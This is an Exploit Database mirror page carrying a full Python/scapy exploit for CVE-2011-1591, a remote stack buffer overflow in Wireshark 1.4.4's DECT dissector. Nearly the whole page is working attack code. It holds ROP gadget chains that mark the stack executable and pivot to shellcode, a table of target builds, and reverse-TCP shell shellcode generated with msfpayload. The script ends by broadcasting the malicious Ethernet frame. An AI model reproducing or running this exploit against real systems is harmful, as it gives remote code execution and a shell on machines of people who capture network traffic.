Wireshark 1.4.4 – DECT Dissector Remote Buffer Overflow

• Exploit Database
• 129 阅读

• 作者： ipv
  日期： 2011-11-22
• 类别：

  • remote
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/18145/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202

  #!/usr/bin/env python # -*- coding: iso-8859-15 -*-   a = """ \n\t-- CVE: 2011-1591 : Wireshark <= 1.4.4 packet-dect.c dissect_dect() --\n # # -------- Team : Consortium-of-Pwners # -------- Author : ipv # -------- Impact : high # -------- Target : Archlinux wireshark-gtk-1.4.3-1-i686.pkg.tar.xz # -------- Description # # This code exploits a remote stack based buffer overflow in the DECT dissector of # wireshark. ROP chains aims to recover dynamically stack address, mprotect it and stack pivot to # shellcode located the payload. # All the process is automated, and bypass any NX/ALSR. # # Operating Systems tested : [see the summary] with scapy >= 2.5 # For any comments, remarks, news, please mail me : ipv _at_ [team] . net ###########################################################################\n"""     import sys, struct if sys.version_info >= (2, 5): from scapy.all import * else: from scapy import *   # align def _x(v): return struct.pack("<I", v)   # Gadget Table - Arch linux v2010.05 default package # - wireshark-cli-1.4.3-1-i686.pkg.tar.xz # - wireshark-gtk-1.4.3-1-i686.pkg.tar.xz arch_rop_chain= [   # Safe SEIP overwrite _x(0x8069acb),# pop ebx ; pop esi ; pop ebp _x(0), _x(0x80e9360), _x(0),# fake (arg1, arg2, arg3), to avoid crash   # mprotect 1st arg : stack & 0xffff0000 _x(0x8067d90),# push esp ; pop ebp _x(0x8081f2e),# xchg ebp eax _x(0x80f9d7f),# xchg ecx, eax _x(0x8061804),# pop eax _x(0xffff0000), # _x(0x80c69f0),# xchg edi, eax _x(0x80ff067),# and ecx edi ; dec ecx _x(0x8077c53),# inc ecx ; sub al 0x5d _x(0x8061804),# pop eax _x(0x7f16a5d0), # avoid crash with dec dword [ecx-0x76fbdb8c] _x(0x8048360),# xchg ecx eax _x(0x8089f46),# xchg edx eax ; std ; dec dword [ecx-0x76fbdb8c] _x(0x8067d90),# push esp ; pop ebp _x(0x8081f2e),# xchg ebp eax _x(0x8067d92)*7,# ret # 1st arg of mprotect is on esp+48 address (see below) _x(0x80745f9),# mov [eax+0x50] edx ; pop ebp _x(0),   # we search address of mprotect (@mprotect = @fopen + 0x6fe70) _x(0x8065226),# pop eax _x(0x81aca20-0xc),# got[fopen] _x(0x8074597),# mov eax [eax+0xc] _x(0x8048360),# xchg ecx eax _x(0x8065226),# pop eax _x(0x6fe70), _x(0x8081f2e),# xchg ebp eax _x(0x806973d),# add ecx ebp _x(0x08104f61), # jmp *%ecx _x(0x0811eb63), # pop ebx, pop esi, pop edi # mprotect args (base_addr, page size, mode) _x(0),# Stack Map that is updated dynamically (see upper) _x(0x10000),# PAGE size 0x1000 _x(0x7),# RWX Mode   # now we can jump to our lower addressed shellcode by decreasing esp register _x(0x8061804),# pop eax _x(0xff+0x50),# esp will be decreased of 0xff + 0x50 bytes; _x(0x80b8fc8),# xchg edi eax _x(0x8067d90),# push esp ; pop ebp _x(0x80acc63),# sub ebp, edi ; dec ecx _x(0x8081f2e),# xchg ebp eax _x(0x0806979e)# jmp *eax ]   # Gadget Table - Bt4 compiled without SSP/FortifySource # Source wireshark 1.4.3 labs_rop_chain = [   # Safe SEIP overwrite _x(0x08073fa1), # popebx;popesi;popebp _x(0), _x(0x0808c4d3), _x(0), # fake (arg1, arg2, arg3), to avoid crash   # sys_mprotect : eax=125(0x7D) ; ebx=address base ; ecx = size page ; edx = mode # mprotect 3r d arg _x(0x080e64cf), # pop edx ; pop es ; add cl cl _x(0x7), _x(0x0), # RWX mode 0x7   # mprotect 1st arg (logical AND with stack address to get address base), _x(0x080a1711), # mov edi esp ; dec ecx _x(0x0815b74f), # pop ecx _x(0xffff0000), # _x(0x0804c73c), # xchg ecx eax _x(0x080fadd7), # and edi eax ; dec ecx _x(0x0804c73c), # xchg ecx eax _x(0x080af344), # mov ebx edi ; dec ecx   # mprotect 2nd arg _x(0x0815b74f), # pop ecx _x(0x10000),# PAGE size 0x10000   # int 0x80 : here vdso is not randomized, so, we use it! _x(0x80d8b71),# pop eax _x(0x7D), # 0x7D = mprotect syscall _x(0x804e6df),# pop *esi _x(0xffffe411), # int 0x80   # _x(0xffffe414), # @sysenter in .vdso _x(0x080ab949), # jmp *esi   # now we can jump to our lower addressed shellcode by decreasing esp register _x(0x0815b74f), # pop ecx _x(256),# esp will be decreased of 256bytes _x(0x080a1711), # mov edi esp ; dec ecx _x(0x081087d3), # sub edi ecx ; dec ecx _x(0x080f7cb1)# jmp *edi ]   addr_os = { # ID # OS# STACK SIZE# GADGET TABLE 1: ["Arch Linux 2010.05",0xb9, arch_rop_chain], # wireshark-gtk-1.4.3-1-i686.pkg.tar.xz 2: ["Labs test ",0xbf, labs_rop_chain], -1 : ["Debian 5.0.8 Lenny",-3, False], # wireshark_1.0.2-3+lenny12_i386.deb -2 : ["Debian 6.0.2 Squeeze",-1, False], # wireshark_1.2.11-6+squeeze1_i386.deb -3 : ["Fedora 14 ",-1, False], # wireshark-1.4.3-1.2.2.i586.rpm -4 : ["OpenSuse 11.3 ",-1, False], # wireshark-1.4.3-1.2.2.i586.rpm -5 : ["Ubuntu 10.10 | 11.04",-1, False], # -6 : ["Gentoo *",-2, False] # }   print a   def usage(): print "Please select and ID >= 0 :\n" print " IDTARGETINFO" print "--------------------------------------------------------------------" for i in addr_os.iteritems(): print "%2d-- %s "%(i[0], i[1][0]), if i[1][1] == -1: print "Default package uses LibSSP & Fortify Source" elif i[1][1] == -2: print "Compiled/Build with Fortify Source" elif i[1][1] == -3: print "DECT protocol not supported" else: print "VULN -> Stack size %d"%(i[1][1])   sys.exit(1)   if len(sys.argv) == 1: usage() elif addr_os.has_key(int(sys.argv[1])) is False: usage() elif int(sys.argv[1]) < 0: usage()   target = addr_os[int(sys.argv[1])] print "\n[+] Target : %s"%target[0]   rop_chain = "".join([ rop for rop in target[2]])   # msfpayload linux/x86/shell_reverse_tcp LHOST=127.0.0.1 C rev_tcp_shell = "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x68\x7f\x00\x00\x01\x66\x68\x11\x5c\x66\x53\x6a\x10\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";     SEIP_SMASH = target[1] print "\t[+] Length for smashing SEIP : 0x%x(%d)"%(SEIP_SMASH, SEIP_SMASH)   nopsled = "\x90" head_nop = 50 shellcode = nopsled * head_nop + rev_tcp_shell + nopsled * (SEIP_SMASH-len(rev_tcp_shell) - head_nop) payload = shellcode + rop_chain # stack alignment if (len(payload) % 2): diff = len(payload) % 2 payload = payload[(2-diff):]   print "\t[+] Payload length : %d"%len(payload)   evil_packet = Ether(type=0x2323, dst="ff:ff:ff:ff:ff:ff") / payload # evil_packet.show()   print "\t[+] Evil packet length : %d"%len(evil_packet)   print "\t[+] Sending packet to broadcast" sendp(evil_packet)